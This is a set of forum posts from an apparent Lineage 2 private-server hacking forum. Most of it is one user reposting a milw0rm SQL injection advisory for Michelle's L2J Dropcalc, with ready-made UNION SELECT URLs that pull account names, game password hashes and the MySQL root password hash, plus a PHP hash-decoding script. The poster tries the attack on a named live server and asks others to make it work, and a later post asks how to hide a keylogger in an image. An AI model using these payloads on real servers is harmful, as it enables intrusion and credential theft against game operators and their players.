caesar4l2

[Hidden Content]

almost all chronicle, the server i'm trying in its gracia and the version of the dropcalc its stil the v4 so compatible with this milworm --> however i'm not that much experienced with sql injection, i've tried this link (injection): http://dropcalc.cfl2.eu/i-search.php?username=[myuser]&token=[mytoken]&langval=0&server_id=1&skin_id=0&itemid=-1%20UNION%20select%20accout_name%20from%20characters%20where%20char_name%20=%20"juda" still nothing, the page is still loading from alike an hour lol (the %20 are spaces in Ieexplorer 7 it write them like that lol)

you can't even read the post get lost :|

i think that if the server you play on its not too much customized and GMs are a little bit "stupid" the trick is easy to do for example the server in which i tried is using l2jfree so in place of "name" i must put "char_name" as in characters.sql table is shown and, yes its old, but Michelle's L2J Dropcalc its still at the same versione (4 at least for the server I mentioned in 1st post) so thats it, no one wonna try? XD

EDIT: decreased post needed again, now to 50, pls someone try this..

The guide is in Code tag... however i'll write it, give me a sec lol

#============================================================================================== # Title: Michelle's L2J Dropcalc # Version: <= v4 # Web Site: http://www.msknight.com/comps/lineage2/myl2jdropcalc.htm # # Discovered By: Codebreak (codebreak1984@gmail.com | www.codebreak.tk) # #============================================================================================== # SQL Injection: (*** Must be logged in, using your own username and Token ***) # # http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=[sql] # # Example: # # Obtain a player username: # http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,account_name,null,null,null,null,null from characters where char_name = "[PLAYER]" # # Obtain a password for that username (*** encrypted): # * only valid if loginserver and gameserver are in the same machine # http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,password,null,null,null,null,null from accounts where login = "[uSERNAME]" # # # Bonus: # # Obtain MYSQL Password (encrypted): # *only valid if the script is executed with root accounts. # http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,Password,null,null,null,null,null from mysql.user where User = "root" and host="localhost" # # *** L2J Encrypted Password can be decoded into a SHA1 hash. I've made a script to do that and it's included in this file # ############################################################################################### <--------- Beginning of PHP Script ---------> <style type="text/css"> <!-- .style3 {font-size: 24px} .style1 {color: #CC0000} --> </style> <? echo("<title>L2J Pass Decoding - POC</title>"); $pass = $_POST['decode']; $unpass3 = base64_decode($pass); $array = unpack("H*", $unpass3); foreach ($array as $key => $value) $unpass2 = $array[1]; echo("<span class=style1><b><u>Decoding Password</u></b></span>"); echo("<br><b>Base 64:</b> $pass<br>"); echo("<b>Unpacked:</b> $unpass3<br>"); echo("<br><b>SHA1:</b> $unpass2<br>"); ?> <form name="form1" method="post" action=""> <div align="center"> <input type="text" name="decode"> <input type="submit" value="Decode"> </div> </form> <br><br><br><center><i>Created by Codebreak</center></i> <------------- End of Script -------------> # milw0rm.com [2007-01-31] c/p from milworm, notice that i've not made it to work if someone make it work pls share the how-to i've tried on www.cfl2.eu but i think i'm missing something.. dunno what btw! the guide is in code tag, however i report i t here: This exploit can be used by Web Browser only for server which supports and have Michelle's L2J Dropcalc running: # SQL Injection: (*** Must be logged in, using your own username and Token ***) # # http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid= # # Example: # # Obtain a player username: # http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,account_name,null,null,null,null,null from characters where char_name = "[PLAYER]" # # Obtain a password for that username (*** encrypted): # * only valid if loginserver and gameserver are in the same machine # http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,password,null,null,null,null,null from accounts where login = "[uSERNAME]" # # # Bonus: # # Obtain MYSQL Password (encrypted): # *only valid if the script is executed with root accounts. # http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,Password,null,null,null,null,null from mysql.user where User = "root" and host="localhost"[/b] as you can see is pretty easy to do, just I don't get it to work, hope someone can help asap i've decreased post to 500 :P EDIT: decreased again, pls someone try this.. caesar

same problem here xD

put the files wherever you want it doesn't matter the folder ^^

options, set ENG and reboot ;)

works for me too, but.. lol i can't use "A" key of my keyboard lol any solutions? XD thx in advance

think no-limit patcher will make the trick, just freazes the time of trials :P

or simply do a custom quest and an html that recalls it. @Shaigan tristania eh? XD

same problem that i've whit the core.dll patch, 2 or 3 minutes of gameplay then it crashes without showing any errors... what to do?

2 or 3 minutes of gameplay than the client crashes... whats wrong?

Mysql Injection, its not that simple :P

i'm following this guide, but i've got problem when i try to register gamerserver, this problem are relatede to java, but i don't know what i've done wrong... i've installed everything perfectly, and also made the l2jdb, and executed the database installer without troubles i've modified the loginserver.properties file using the localhost ip (127.0.0.1) ad using as DNS ip always 127.0.0.1 is this wrong? i only want to test the server in local if someone can hel, i'll be tnkfull caes

good idea, but, so that i' a noob in these things XD, how to insert a keylogger in an image, and also, how to take back all the informations we want? XD thxi nadvance 4 answer

i play in a kamael server and this does not work, i've tried 4 raid, and the pet never get petrified (and the pet was alwais 11 lvl or 10 lvl above the raid) so, its fixed in kamael server (a least the one I play ^^")

asd i've the same problem XD however, if i give the pet to the prophet lvl 50, and the pet is lvl60 and i buff it only with berserk and with freezing skin its good? another question, the aid may be bufed before or after that we buff the pet, and pet attacks him? sorry for my englsh >_< hope u understand xD cya caes

very good... i'll try xD thx

no it quite doesn't inject in kamael server i've tested (u may try the server is a 5000x name Handofnorth) ---> don't work ^^

use the search

still don't work the zoom... what we have todo to have this zoom working? pls tell me Q_Q

is this working?... i'll try^^ thx again alemanob^^